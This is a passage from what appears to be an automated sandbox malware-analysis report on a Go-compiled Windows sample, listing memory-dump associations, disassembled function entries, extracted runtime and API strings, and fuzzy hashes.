                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$ nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebr$ previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregist$ sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari$mspan.sweep: bad span state after sweepout of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+$mspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in $runtime: nelems=schedule: in cgotime: bad [0-9]*timeBeginPeriod$sweep increased allocation counttransform: short internal bufferuse of closed network connectionx509: ECDSA verification failurex509: cannot parse rfc822Name %qx509: invalid constraint value: x509: malformed subjectPublicKeyx509: unsupported elliptic curve of $swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-1471226921
                                                                                • Opcode ID: 0497c5cf18ff1f170b3dec169f1095b0d30ee94ab6e90b3fb5fc5062453221e7
                                                                                • Instruction ID: 9a1e53023412e24af7e6c67f7a529679f1f618b36fa9cd20435c7ff9b9a44950
                                                                                • Opcode Fuzzy Hash: 0497c5cf18ff1f170b3dec169f1095b0d30ee94ab6e90b3fb5fc5062453221e7
                                                                                • Instruction Fuzzy Hash: 461289B45087548FC310EF25C19076EBBE0BF99708F45896EE8C98B392D734D94ADB92
                                                                                Function 00AF9F40 Relevance: 12.9, Strings: 10, Instructions: 407COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AFA2A3, 00AFA482
                                                                                • (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame, xrefs: 00AFA279, 00AFA458
                                                                                • untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreatePr, xrefs: 00AFA335
                                                                                • args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish name for time zone "FindFirs, xrefs: 00AFA24F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AFA35F, 00AFA53D
                                                                                • runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of t, xrefs: 00AFA30B, 00AFA4E3
                                                                                • locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "GetProcessPreferredU, xrefs: 00AFA42E
                                                                                • runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailin, xrefs: 00AFA1F9, 00AFA3D8
                                                                                • and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRO, xrefs: 00AFA224, 00AFA403
                                                                                • bad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmiss, xrefs: 00AFA2BE, 00AFA49D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame$ and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRO$ args stack map entries for 18189894035458564758300781259094947017729282379150390625Aus Central W. Standard TimeCanada Central Standard TimeCen. Australia Standard TimeCentral Europe Standard TimeCertCreateCertificateContextEnglish name for time zone "FindFirs$ locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Time (Mexico)GODEBUG: unknown cpu feature "GetProcessPreferredU$ untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreatePr$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$bad symbol tablecastogscanstatuscontext canceleddivision by zerogc: unswept spangcshrinkstackoffgetprotobynumberinteger overflowinvalid argumentinvalid encodinginvalid exchangeinvalid g statuslength too largemSpanList.insertmSpanList.removemessage too longmiss$runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of t$runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malformed OIDx509: trailin
                                                                                • API String ID: 0-197905243
                                                                                • Opcode ID: f4a3dd08fc5ecf82f9fe75329793ce6400ff68c69ccd3c08116d8c40fc893209
                                                                                • Instruction ID: e06cedb98b356f22fda9b58e9b981582447f456e6636f78292875f2c38a5b16e
                                                                                • Opcode Fuzzy Hash: f4a3dd08fc5ecf82f9fe75329793ce6400ff68c69ccd3c08116d8c40fc893209
                                                                                • Instruction Fuzzy Hash: B702FFB4A08B458FC344EF69D58066EBBE1BF88708F518A2EF99887351D774E844CF52
                                                                                Function 00AB5C00 Relevance: 12.7, Strings: 10, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • , xrefs: 00AB5E08
                                                                                • interface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not availableprotocol not suppo, xrefs: 00AB5CBD, 00AB5E79, 00AB5F27
                                                                                • : missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGetClassObjectDllRegisterServerDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB S, xrefs: 00AB5EB5
                                                                                • is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStore, xrefs: 00AB5F49
                                                                                • , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySyriacTa, xrefs: 00AB5CF9
                                                                                • is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqua, xrefs: 00AB5E93
                                                                                • (types from different packages)!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~28421709430404007434844970703125: day-of-year does not match dayCOFF symbol offset out of boundsCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapI, xrefs: 00AB5DFE
                                                                                • interfaceinterruptinvalid nipv6-icmpmSpanDeadmSpanFreentdll.dllole32.dllomitemptypanicwaitpclmulqdqpreemptedprintablepsapi.dllrecover: : rwxrwxrwxscavtracestackpooltracebackunderflowwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= ru, xrefs: 00AB5C32
                                                                                • (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim, xrefs: 00AB5E36
                                                                                • is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1, xrefs: 00AB5CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ (types from different packages)!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~28421709430404007434844970703125: day-of-year does not match dayCOFF symbol offset out of boundsCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyGetVolumePathNamesForVolumeNameWMapI$ (types from different scopes) in prepareForSweep; sweepgen locals stack map entries for 227373675443232059478759765625Central European Standard TimeCentral Standard Time (Mexico)CertDeleteCertificateFromStoreE. South America Standard TimeEastern Standard Tim$ is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1$ is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStore$ is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqua$, not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNativeRejangSCHED STREETStringSundaySyriacTa$: missing method ARM little endianAdjustTokenGroupsAssemblyProcessorCertFindExtensionCreateFileMappingCreateStdDispatchCryptDecodeObjectDispGetIDsOfNamesDllGetClassObjectDllRegisterServerDnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB S$interface conversion: internal inconsistencyinvalid number base %dkernel32.dll not foundminpc or maxpc invalidmissing ']' in addressnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not availableprotocol not suppo$interfaceinterruptinvalid nipv6-icmpmSpanDeadmSpanFreentdll.dllole32.dllomitemptypanicwaitpclmulqdqpreemptedprintablepsapi.dllrecover: : rwxrwxrwxscavtracestackpooltracebackunderflowwbufSpans} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= ru
                                                                                • API String ID: 0-365028384
                                                                                • Opcode ID: 272b4b48ec98fc7788f7c7f296f86ad3ee89e783e0ca4ce86696bddbb27340bf
                                                                                • Instruction ID: ad904935eb1b544898ee1f84b9b518bb3a6066723c4ca6452d2e71b298aa2abf
                                                                                • Opcode Fuzzy Hash: 272b4b48ec98fc7788f7c7f296f86ad3ee89e783e0ca4ce86696bddbb27340bf
                                                                                • Instruction Fuzzy Hash: CFA188B49083409FD318DF64D580BAABBF1BB88704F50892EE89987351DB75A848CF52
                                                                                Function 00AE0820 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00AE0A51
                                                                                • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v, xrefs: 00AE0B3B
                                                                                • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit, xrefs: 00AE0B07
                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlap : missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m i, xrefs: 00AE0A85
                                                                                • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscall : failed to generate random pointinvalid certificate header in security directorynot enough significa, xrefs: 00AE0AE0
                                                                                • ,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-, xrefs: 00AE09E5
                                                                                • %, xrefs: 00AE0B44
                                                                                • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval, xrefs: 00AE0AAC
                                                                                • bad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpecialmspanSpe, xrefs: 00AE0A2A
                                                                                • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malform, xrefs: 00AE09BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definit$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)v$%$,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscall : failed to generate random pointinvalid certificate header in security directorynot enough significa$VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlap : missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m i$bad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpecialmspanSpe$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=scavengeOne called with unaligned work regiontransform: input and output are not identicalw must be at least 2 by the definition of NAFx509: IP constraint contained inval$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown hash value unknown wait reasonwinmm.dll not foundx509: malform
                                                                                • API String ID: 0-3267003949
                                                                                • Opcode ID: 04ec345bab4de8249725218a257766fccacbc0bed5dabacbb90328ad1b5c7312
                                                                                • Instruction ID: 8d2180836e7400da263c8f797403f3a928122a3a57f2daf170351b2a163906e2
                                                                                • Opcode Fuzzy Hash: 04ec345bab4de8249725218a257766fccacbc0bed5dabacbb90328ad1b5c7312
                                                                                • Instruction Fuzzy Hash: 3981D3B4509B818FD300EF65D295B5EBBE0AF88748F40896DF4888B392D7B4D945CF52
                                                                                Function 00AC01E0 Relevance: 12.6, Strings: 10, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                Strings
